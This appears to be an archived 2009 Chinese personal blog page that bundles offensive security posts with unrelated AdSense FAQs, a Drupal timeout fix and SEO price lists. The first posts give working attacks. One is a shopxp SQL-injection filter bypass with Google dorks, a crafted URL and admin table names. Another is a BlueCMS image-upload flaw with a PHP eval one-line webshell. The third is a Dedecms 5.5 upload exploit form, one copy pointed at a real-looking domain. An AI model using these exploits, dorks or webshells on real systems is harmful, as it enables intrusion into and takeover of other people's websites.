shopxp网上购物系统 v7.4存在Sql注入漏洞

2009年10月31日星期六 | | 0 评论 |

作者:んㄗ葑訫鎖愛'S
shopxp网上购物系统 v7.4存在Sql注入漏洞。
问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp
问题代码:
<%

dim shopxpbe_id, anclassname, shopxpse_id, nclassname
dim totalPut
dim CurrentPage, TotalPages

if request("shopxpbe_id")<>"" then
shopxpbe_id=request("shopxpbe_id")
else
shopxpbe_id=0
end if
if request("shopxpbe_id")="" then
shopxpbe_id=1
end if
if not isempty(request("page")) then
currentPage=cint(request("page"))
else
currentPage=1
end if

set rs=server.createobject("adodb.recordset")
rs.open "select * from shopxp_btype where shopxpbe_id="&shopxpbe_id,conn,1,1
anclassname=rs("shopxpbe_name")
rs.close
%>
并没有对shopxpbe_id进行整形判断。下面在说说他的防注入系统。好像是网上的枫叶防注入。看代码吧:
Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx
Fy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向
Fy_Zx = "../" '出错时转向的页面
On Error Resume Next
Fy_Url=Request.ServerVariables("QUERY_STRING")
Fy_a=split(Fy_Url,"&")
redim Fy_Cs(ubound(Fy_a))
On Error Resume Next
for Fy_x=0 to ubound(Fy_a)
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
Next
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
Select Case Fy_Cl
省略部分代码

这个防注入系统在网上貌似很火,但是他防的是有问题的。关键是这句,Fy_Url=Request.ServerVariables("QUERY_STRING"),Request.ServerVariables得到的数据是原样的,并不会进行URL解码。这也就导致可以进行URL编码绕过这个防注入。以下是lake2对这段代码的分析:

"它的思路就是先获得提交的数据,以"&"为分界获得并处理name/value组,然后判断value里是否含有定义的关键字(这里为求简便,我只留下了"and"),有之,则为注射。

乍一看去,value被检查了,似乎没有问题。呵呵,是的,value不会有问题,可是,name呢?

它的name/value组值来自于Request.ServerVariables("QUERY_STRING"),呵呵,不好意思,这里出问题了。Request.ServerVariables("QUERY_STRING")是得到客户端提交的字符串,这里并不会自动转换url编码,哈哈,如果我们把name进行url编码再提交的话,呵呵,那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0,此时程序能够检测到;如果提交%50h4nt0m=lake2 and lis0(对p进行url编码),程序就会去判断%50h4nt0m的值,而%50h4nt0m会被转换为ph4nt0m,所以%50h4nt0m值为空,于是就绕过了检测。

等等,为什么既然name不解码可以绕过检查而value就不能绕过呢?因为value的值取自Request(Fy_Cs(Fy_x)),这个服务器就会解码的。

程序怎么改进呢?只要能够得到客户端提交的数据是解码后的就可以了,把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。"

下面说下利用:
Google:inurl:xpCatalog_xpDesc.asp?action_key_order=big
inurl:Catalog_Desc.asp?action_key_order=big (这个貌似是商业版的)
构造如下地址:
http://www.xxx.com/xpCatalog_xpDesc.asp?action_key_order=big&shopxpbe_%69d=79 (对i进行URL编码),交给工具 手动添加表名:shopxp_admin 和shop_admin(商业版的)
默认后台是 admin_shopxp 或者admin
 
我的QQ空间
显示桌面[备用]
[Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=...
 

bluecms 0day

| | 0 评论 |

作者:st0p
转载请注明出处:http://www.st0p.org

注:不好意思了,作者早上才发的版本,晚上就叫偶给报了个0DAY,通知了下作者,刚去官方看了一下,已发布了安全补丁,很快啊..大家可以去网上下没更新版本进行测试...

唉,群里一个朋友发了一个CMS,说用户资料修改部分可能存在注入,说一起分析,本地安装好后发现,没法利用,在magic_quotes_gpc=off的情况下,单引号被转义了。。。

看到include/common.inc.php中的这行,放弃。。

1  2  3  4  5  6  7  8  9  
......   if(!get_magic_quotes_gpc())   {   	$_POST = deep_addslashes($_POST);   	$_GET = deep_addslashes($_GET);   	$_COOKIES = deep_addslashes($_COOKIES);   	$_REQUEST = deep_addslashes($_REQUEST);   }  ......

也许是st0p的运气好,看到有上传图片的部分,分析了一下代码,在user.php中发现利用的东西。。

1  2  3  4  5  6  
    require_once(BLUE_ROOT . 'include/upload.class.php'); //调用上传类      $image = new upload();  	 if(isset($_FILES['face_pic']['error']) && $_FILES['face_pic']['error'] == 0){  		$face_pic = $image->img_upload($_FILES['face_pic'], 'face_pic');                            //没检测后缀直接带入,类中要是也没有就能传SHELL了  	}

打开include/upload.class.php发现,只是检测了文件头,没有检测后缀

1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  
......  class upload {  	private $allow_image_type = array('image/jpg', 'image/gif', 'image/png', 'image/pjpeg');  ......      function img_upload($file, $dir = '', $imgname = ''){      	if(empty($dir)){      		$dir = BLUE_ROOT.DATA.UPLOAD.date("Ym")."/";      	}else{      		$dir = BLUE_ROOT.DATA.UPLOAD.$dir."/";      	}         	if(!file_exists($dir)){      		if(!mkdir($dir)){      			showmsg('上传过程中创建目录失败');      		}      	}      	if(empty($imgname)){      		$imgname = $this->create_tempname().$this->get_type($file['name']);      	}      	$imgname = $dir . $imgname;      	if(!in_array($file['type'],$this->allow_image_type)){               //只是检测了文件头部来着,那我们就直接构造一个SHELL就好了      		showmsg('不允许的图片类型');      	}            }

把以上内容另存为st0p.php

1  2  
GIF89a  <?php eval($_POST[st0p]);?>

注网帐号,登陆,会员中心-->我的个人资料,然后上传新图像选咱们构造的PHP文件,点确认修改,成功后,直接在照片上右击查看地址就行了。。一句话SHELL上传成功!

bluecms-0day1

bluecms-0day2

分析完毕,嘿嘿,希望大家多交流,这些东西发出来只是想多认识些朋友,一起讨论技术,开设群也是这样,由于只是普通群,只能有100人,今天清理了下从未说话的人,竟被人说我在装B乱T人,郁闷,开群就是为了交流,不说话一直占位有何用,想进步的话,孤高之路不可走!
如果你进群只是为了从别人那得到别人的讨论成果,不知道付出或只是加进来潜水的,那还是不加的好。。。

 
我的QQ空间
显示桌面[备用]
[Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=...
 

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

2009年10月26日星期一 | | 0 评论 |

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
 
SSV ID:12518
SEBUG-Appdir:织梦(DedeCms)
发布时间:2009-10-20
影响版本:
Dedecms 5.5
漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。
<*参考
by:Flyh4t
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<html>  <head>   <title>Dedecms v55 RCE Exploit Codz By flyh4t</title>  </head>  <body style="FONT-SIZE: 9pt">   ---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />   <form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>    <input type='hidden' name='activepath' value='/data/cache/' />    <input type='hidden' name='cfg_basedir' value='../../' />    <input type='hidden' name='cfg_imgtype' value='php' />    <input type='hidden' name='cfg_not_allowall' value='txt' />    <input type='hidden' name='cfg_softtype' value='php' />    <input type='hidden' name='cfg_mediatype' value='php' />    <input type='hidden' name='f' value='form1.enclosure' />    <input type='hidden' name='job' value='upload' />    <input type='hidden' name='newname' value='fly.php' />    Select U Shell <input type='file' name='uploadfile' size='25' />    <input type='submit' name='sb1' value='确定' />   </form>   <br />It's just a exp for the bug of Dedecms V55...<br />   Need register_globals = on...<br />   Fun the game,get a webshell at /data/cache/fly.php...<br />  </body>  </html>
SEBUG安全建议:
暂无  请关注官方补丁
// sebug.net [2009-10-26]
 
我的QQ空间
区分一下:"Google搜索联盟"和"AdSense搜索广告"
区分一下:"Google搜索联盟"和"AdSense搜索广告" "Google搜...
 

Dedecms select_soft_post.php页面变量未初始漏洞

| | 0 评论 |

影响版本:Dedecms 5.5
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。代码如下:

<html><head><title>Dedecms v55 RCE Exploit Codz By flyh4t</title></head>  <body style="FONT-SIZE: 9pt">---------- Dedecms v55 RCE Exploit Codz By flyh4t  ---------- <br /><br />  <form action=http://url/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>  <input type='hidden' name='activepath' value='/data/cache/' />  <input type='hidden' name='cfg_basedir' value='../../' />  <input type='hidden' name='cfg_imgtype' value='php' />  <input type='hidden' name='cfg_not_allowall' value='txt' />  <input type='hidden' name='cfg_softtype' value='php' />  <input type='hidden' name='cfg_mediatype' value='php' />  <input type='hidden' name='f' value='form1.enclosure' />  <input type='hidden' name='job' value='upload' />  <input type='hidden' name='newname' value='fly.php' />  Select U Shell <input type='file' name='uploadfile' size='25' />  <input type='submit' name='sb1' value='确定' />  </form>  <br />  It's just a exp for the bug of Dedecms V55...<br />  Need register_globals = on...<br />  Fun the game,get a webshell at /data/cache/fly.php...<br />  </body>  </html>

请自行修改form表单对应的网站域名url。

From:http://www.nuanyue.com/dedecms-select_soft_post-php%e9%a1%b5%e9%9d%a2%e6%9c%aa%e5%88%9d%e5%a7%8b%e6%bc%8f%e6%b4%9e.html
 
我的QQ空间
区分一下:"Google搜索联盟"和"AdSense搜索广告"
区分一下:"Google搜索联盟"和"AdSense搜索广告" "Google搜...
 

[分享]区分一下:“Google搜索联盟”和“AdSense搜索广告”

2009年10月24日星期六 | | 0 评论 |

区分一下:"Google搜索联盟"和"AdSense搜索广告"
 
"Google搜索联盟"和"adsense for search"不是一回事,Google 搜索联盟是 AdSense 的一款新产品,google搜索联盟属于adsense for search的新产品,但是不同于以前的普通的adsense for search。Google 搜索联盟和标准的 AdSense搜索广告之间的区别可归纳如下:
  
  1· 使用 Google 搜索联盟,用户通过 Google.cn/search 查看搜索结果,而使用标准的 AdSense搜索广告,用户通过 Google.cn/custom 查看搜索结果。
  2· 使用 Google 搜索联盟时,AdSense 发布商不能选择所需徽标和配色方案来自定义搜索结果页。
  3· AdSense 发布商不能通过 Google 搜索联盟对在线搜索投放渠道使用竞争性广告过滤器和网站风格搜索。
  4· 虽然我们向 AdSense 发布商提供了在其网站上通过常规 AdSense搜索广告展示搜索结果的选项,但他们不能通过 Google 搜索联盟在自己网站上展示搜索结果。(是不允许,还是没有提供这功能而不能?平台接口是不同的,没有提供单独结果的页面。)
  5· 广告提成比例更高

主要区别在于:
1、搜索结果直接显示在google.cn页面
2、广告提成比例更高

发布商可以通过在页面相应位置添加搜索框来向用户提供搜索服务,搜索结果将在 Google.cn 展示。在为期一年的推广期内,对于用户有效的广告点击,发布商可以得到更高的分成比例。

AdSense 小组针对搜索联盟的相关问题做了以下解答:

1. 我能否加入 Google 搜索联盟?
所有中国发布商均可加入 Google 搜索联盟。对于愿意使用 Google 原有在线搜索产品的发布商,在 AdSense 政策允许情况下,可以在保留原有搜索框的同时,增加 Google 搜索联盟,丰富搜索形式。

2. 如何加入搜索联盟:
1). 访问 https://www.google.com/adsense,登录账户
2). 选择 AdSense 设置
3). 选择 AdSense for Search
4). 网站语言栏选择"中文",国家或地区栏选择"中国"
5). 选择"Google 风格搜索结果"(这一步最重要)
6). 继续其他选项
7). 从代码框中获取代码,放置在页面相应位置

3. 一年的推广期从什么时候开始计算?
推广期从该产品上线开始计算,即2007年9月-2008年9月。

4. 我能否设置热门搜索词?
目前我们只针对一些大客户提供该功能。我们会根据用户反馈,考虑普及类似设置。
 
From:http://www.dunsh.org/forums/thread-29151-1-1.html
转载请注明出处,谢谢合作!:http://home.benz.la/
 
我的QQ空间
经典一撇
生活在喧嚣的城市生活中,时不时都会碰到一些经典的镜头,在很久很...
 

[分享]和Google AdSense 有关的 5 个最常见问题

| | 0 评论 |

和Google AdSense 有关的 5 个最常见的问题

以下内容出自:Google AdSense
 
1.如何注册?
        在开始加入 AdSense for content 或 AdSense for search 前,您只需检查您的网站是否符合我们的计划政策。接着,如果您做好了加入我们计划的准备,请访问 Google AdSense 主页,并单击单击此处申请


        填完申请表并提交后,请查阅我们发送给您的电子邮件,以确认您的电子邮件地址。在您确认自己的电子邮件地址后,我们将审核您的申请,并在 2 到 3 天内通过电子邮件与您进一步取得联系。如果您的申请得到批准,则可以登录到自己的 AdSense 帐户,开始使用此计划。
 
2.如何向帐户中添加更多网站?
 
当您将 AdSense 代码添加到新的网站上时,无需另外新开一个帐户或通知我们。通过您的帐户的 AdSense 设置标签上的引导步骤生成的广告代码和搜索代码,对于您希望展示 Google 广告或 AdSense for search 框的任何站点上的任何页面都有效。您只需将代码添加到页面源代码中,我们将会自动检测新的网站。


要将代码放入新的网站,请按照以下步骤操作:

要展示 Google 广告,请执行以下操作:

通过 https://www.google.com/adsense 登录到您的帐户。
点击 AdSense 设置标签并选择 AdSense for content 作为产品。
按照引导步骤选择广告类型、格式、颜色和任何其他选项。
从您的 AdSense 代码框中复制广告代码。
将代码粘贴到贵网站的相应源代码页中。
要展示 AdSense for search 框,请执行以下操作:

通过 https://www.google.com/adsense 登录到您的帐户。
点击 AdSense 设置标签并选择 AdSense for search 作为产品。
按照引导步骤选择搜索类型、搜索框、搜索结果式样和其他任何选项。
从您的 AdSense 代码框中复制搜索代码。
将代码粘贴到贵网站的相应源代码页中。
查阅我们的快速启动指南可获得有关向网站中添加代码的更为详细的说明。
 
3.何时可以获得付款?
 
 除非您的帐户处于付款保留状态或另有书面协定(包括电子邮件),当您的帐户余额达到 $100 美元后,我们会在当月月末后约 30 天内向您发出支票或电子转帐付款。

例如,如果您在一月份和二月份分别获得 $40 美元和 $70 美元的收入,我们就会在三月月末之前向您发出付款。

如果您帐户的当月月末余额不足 $100 美元,我们就会将您的收入转入下月,直到达到付款限额。余额由 AdSense for content(针对内容的 AdSense)、AdSense for search(针对搜索的 AdSense)及推介的总收入构成。您可以浏览下面的付款周期图示,详细了解付款周期。

请注意,如果我们发现某个发布商的帐户违反了我们的条款或政策,我们随时可以停止付款(自 Google 对可能违反条款或政策的情况展开调查之时起)、追回发布商的帐户收入和/或向广告客户退回此发布商网站或 AdSense for search 结果页的广告点击费用。另外,如果发布商有与 Google AdWords 计划相关的任何逾期欠款尚未支付给 Google,我们将保留停止付款的权利,直至未结欠款全部结清。
 
4.我可以过滤在我的网站上展示的广告吗?
 
 可以。您可以将不希望在自己网站上或 AdSense for search 结果页中展示的广告的网址列入网站过滤列表中。要创建及管理过滤列表,只需通过 https://www.google.com/adsense 登录到您的帐户,然后点击 AdSense 设置标签下的竞争性广告过滤器链接即可。您可以为内容网页和 AdSense for search 结果页创建单独的过滤列表。如果您把某个网站的网址加入到竞争性广告过滤列表中,那么该网站的广告通常就不会展示在您的网页中。但是请记住,对网站进行过滤可能会减少能够出现在您的网页上的广告数量,同时也会减少您可能获得的收入。

有关使用竞争性广告过滤器的详细信息,请参阅常见问题解答的过滤广告部分。

我们还将编辑人员与过滤技术这两种手段结合使用,最大限度地提高 Google 和发布商网站上的 Google 广告的质量:

审核:整个 Google 联网中的广告都要经过人工和自动化结合起来的审核程序后,才会展示在发布商的网站上。这一审核过程要审查许多因素,包括广告质量以及此广告是否适合所有受众。

敏感内容过滤:有时,某些广告并不适合投放在所有网页上。例如,Google 会自动过滤掉不适合在报道灾难性事件的新闻网页上展示的广告。

请注意,对于竞争性广告过滤列表中的网站的广告或包含不恰当内容的广告,Google 不能保证这些广告完全不会展示在您的网站上。
 
5.我可以通过此计划获得多少收入?
 
能够在您的内容网页上展示的 Google 广告既可以是按每次点击费用 (CPC) 付费的广告,也可以是按每千次展示费用 (CPM) 付费的广告,而 AdSense for search 结果页仅展示 CPC 广告。也就是说,在用户点击广告或者您的网站上展示了广告客户的广告时,广告客户会向您付款。您收到的金额是针对贵网站所发生的一种或两种行为的一部分付款。尽管我们不会详细公布收入分配情况,但我们的目标是保证发布商获得的收入不会少于他们加入其他广告网所能获得的收入。

弄清能赚多少的最好办法是立即注册,并在网页上开始展示广告。您无需支付任何费用、承担任何义务,而且加入此计划非常快速、简单。您可以到 AdSense 主页上注册,网址为 https://www.google.com/adsense

加入 Google AdSense 后,您可以随时通过 https://www.google.com/adsense 登录到自己的 Google AdSense 帐户,单击报告标签,查看收入情况。可以查看网页和广告单元的总展示次数、广告点击次数、点击率、有效的每千次展示费用以及总收入,从而了解此计划的执行效果,以及一段时间内预计能够通过此计划获得的收入。
 
我的QQ空间
经典一撇
生活在喧嚣的城市生活中,时不时都会碰到一些经典的镜头,在很久很...
 

经典一撇

2009年10月19日星期一 | | 0 评论 |

   生活在喧嚣的城市生活中,时不时都会碰到一些经典的镜头,在很久很久以前.还没发明像机的时候人们用绘画绘出人们的记忆,心中的经典.素描依旧的今天,人们还多了一重选择.可以操起手中的"像机"来记录自己心目中的"经典",
 
下图仅仅做为一个exp,来表达我所见到的一个经典,记录一个回忆..  :)
 
 
转载请注明出处...
我的QQ空间
解决:Fatal error: Maximum execution time of 30 seconds
drupal的模块状态多会导致启用模块时候出现一个类似错误Fatal er...
 

解决:Fatal error: Maximum execution time of 30 seconds

2009年10月14日星期三 | | 0 评论 |

 drupal的模块状态多会导致启用模块时候出现一个类似错误

Fatal error: Maximum execution time of 30 seconds exceeded in D:\wamp\www\drupal\includes\common.inc on line 501

是因为程序执行时间超过了最大允许执行时间

解决办法:

修改php.ini:
max_execution_time = 300 ,秒可以设置更大,这里是300秒,然后重起服务

如果修改php.ini的办法还是不行,就试试这样,找到你的Drupal站点的settings.php,在里面的ini_set部分底下新加一行

ini_set('max_execution_time', 100); 使Drupal自己去设置最大执行时间,也就是调用了set_time_limit(100) ,0为无限制

然后试试看,基本就可以解决问题了

如果还不可以的话说明你之前安装的模块过多或者你的一个模块关联的模块过多,可以再加上几十秒到上百秒不等,反正安装模块的时候不是很多,多等一会无所谓。

但是看过台湾阿舍得经验谈后,建议还是在你安装成功模块后,还是注掉ini_set('max_execution_time', 时间);这行,比较安全

网上还有个解决办法是修改数据库文件,大至如下,也可以尝试一下:

找到mysql的根目录下的my.ini(my.cnf)文件,打开后找到最后一行
[mysqld]
port=3306

下面加上:
set-variable =   max_allowed_packet=设置大一些比如 10M

 
我的QQ空间
开怀一笑[收集ing]
人=吃饭+睡觉+上班+玩,猪=吃饭+ 睡觉,代入:人=猪+上班+玩,即:人-...
 

带你看看国外提供的SEO服务内容与SEO报价

| | 0 评论 |

     我们来看看国外提供的seo服务内容和seo报价。

     这个是比中国还便宜的某国seo服务商提供的号称世界上最便宜的价格。报价服务期限从6个月开始计算。

  我把服务价格和内容整理到下面,可以供seo服务人员报价时参考。

  结合seo和品牌营销组合,他们提供的银卡,金卡,白金卡各级捆绑seo和互联网营销服务。

  银卡( $ 250/month )为您提供了充分的seo优化和每月基本优化的公关合作伙伴。满足小公司紧张的预算。

  6 month - $1500

  12 month - $3000

  18 month - $4500

  特点:

  免费没有义务初步seo的报告(价值$250 )

  深度关键字研究

  竞争力分析

  完全"网页 "优化

  创新的主题链接页

  Google的XML格式的Sitemap

  robot.txt 优化

  编辑适合seo的内容

  seo自定义登陆页面

  搜索引擎提交

  图形和ALT标记优化

  每月报告

  电子邮件支持

  帐户管理

  免费咨询搜索引擎的新兴趋势

  网络营销的特点:

  每月优化的公关合作伙伴。

  金卡( $ 450/month )为您提供了充分的seo优化及每周优化的公关合作伙伴。更好地为中小型新兴的公司,在市场营销中多一点投资。

  6 month - $2700

  12 month - $5400

  18 month - $8100

  特点:

  免费没有义务初步seo的报告(价值$250 )

  深度关键字研究

  竞争力分析

  完全"网页 "优化

  创新的主题链接页

  Google的XML格式的Sitemap

  robot.txt 优化

  编辑适合seo的内容

  seo自定义登陆页面

  搜索引擎提交

  图形和ALT标记优化

  每月报告

  电子邮件支持

  帐户管理

  免费咨询搜索引擎的新兴趋势

  网络营销的特点:

  每周优化的公关合作伙伴。

  白金卡( $ 1100/month )为您提供了充分的seo优化和我们的总网络营销组合服务,其中包括每周优化的公关合作伙伴结合每周博客网络联合供稿和双周刊出版的专题文章。建议高增长公司需要竞争的市场地位。

  6 month - $6600

  12 month - $13200

  18 month - $19800

  特点:

  免费没有义务初步seo的报告(价值$250 )

  深度关键字研究

  竞争力分析

  完全"网页 "优化

  创新的主题链接页

  Google的XML格式的Sitemap

  robot.txt 优化

  编辑适合seo的内容

  seo自定义登陆页面

  搜索引擎提交

  图形和ALT标记优化

  每月报告

  电子邮件支持

  帐户管理

  免费咨询搜索引擎的新兴趋势

  网络营销的特点:

  每周最佳公关合作伙伴。

  每周优化博客联合供稿。

  双周刊优化集团的文章发布。

 
我的QQ空间
开怀一笑[收集ing]
人=吃饭+睡觉+上班+玩,猪=吃饭+ 睡觉,代入:人=猪+上班+玩,即:人-...
 

一般的SEO报价表

| | 0 评论 |

服务类型 要求   排名效果[如有竞价,则顺推] 价格   普及型 用户提供5-15个关键字 保证至少1个关键字百度左侧排名前10位 2000元   推广型 用户提供10-15个关键字 保证至少3个关键字排名前20位,其中一个前10名 7000元   专业型 用户提供15-20个关键字 保证至少5个关键字排名前20位,其中三个前10名 14000元    说明[适用于可选关键词左侧优化排名]:   以下情况左侧优化排名seo价格个案处理:        A)关键词过热或相关性竞争过高。 B)要求的排名位置不包括在以上所列范围。 C)客户其他的特殊要求,需要另行考虑左侧优化排名SEO报价的。           百度 左侧优化排名SEO报价(指定关键词)   关键词 热门程度   相关性 SEO报价    (元/关键词) 排名效果[如有竞价,则顺推]   冷门 关键词搜索结果30万以内 低 2000 排名前10   中 3000 排名前10   高 6000起 排名前10   一般 搜索结果30万到100万 低 3000 排名前10   中 4000 排名前10   高 7000起 排名前10   频繁 搜索结果100万到300万 低 4000 排名前10   中 5000 排名前10   高 9000起 排名前10   热门   搜索结果300万以上 低 5500 排名前10   中 7000 排名前10   高 12000起 排名前10    说明[适用于指定关键词左侧优化排名]:   1) 给出多个关键词,可选择性优化排名其中的1-3个关键词,可以获得优惠的左侧优化排名价格。   2) 以下情况seo价格个案处理:        A)关键词过热或相关性竞争过高。 B)要求的排名位置不包括在以上所列范围。 C)客户其他的特殊要求,需要另行考虑左侧优化排名SEO报价的。           Google左侧优化排名SEO报价(可选关键词)   服务类型 要求   排名效果 价格   普及型 用户提供5-15个关键字 保证至少1个关键字Google左侧排名前10位 2000元   推广型 用户提供10-15个关键字 保证至少3个关键字排名前20位,其中一个前10名 7000元   专业型 用户提供15-20个关键字 保证至少5个关键字排名前20位,其中三个前10名 14000元    说明[适用于可选关键词左侧优化排名]:   以下情况左侧优化排名seo价格个案处理:        A)关键词过热或相关性竞争过高。 B)要求的排名位置不包括在以上所列范围。 C)客户其他的特殊要求,需要另行考虑左侧优化排名SEO报价的。           Google左侧优化排名SEO报价(指定关键词)   关键词 效果   相关性 SEO报价    (元/关键词) 排名效果   冷门 关键词搜索结果30万以内 低 2000 排名前10   中 3000 排名前10   高 6000起 排名前10   一般 搜索结果30万到100万 低 3000 排名前10   中 4000 排名前10   高 7000起 排名前10   频繁 搜索结果100万到300万 低 4000 排名前10   中 5000 排名前10   高 9000起 排名前10   热门   搜索结果300万以上 低 5500 排名前10   中 7000 排名前10   高 12000起 排名前10    说明[适用于指定关键词左侧优化排名]:   1) 给出多个关键词,可选择性优化排名其中的1-3个关键词,可以获得优惠的左侧优化排名价格。   2) 以下情况价格个案处理:        A)关键词过热或相关性竞争过高。 B)要求的排名位置不包括在以上所列范围。 C)客户其他的特殊要求,需要另行考虑左侧优化排名SEO报价的。 
 
我的QQ空间
开怀一笑[收集ing]
人=吃饭+睡觉+上班+玩,猪=吃饭+ 睡觉,代入:人=猪+上班+玩,即:人-...
 


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]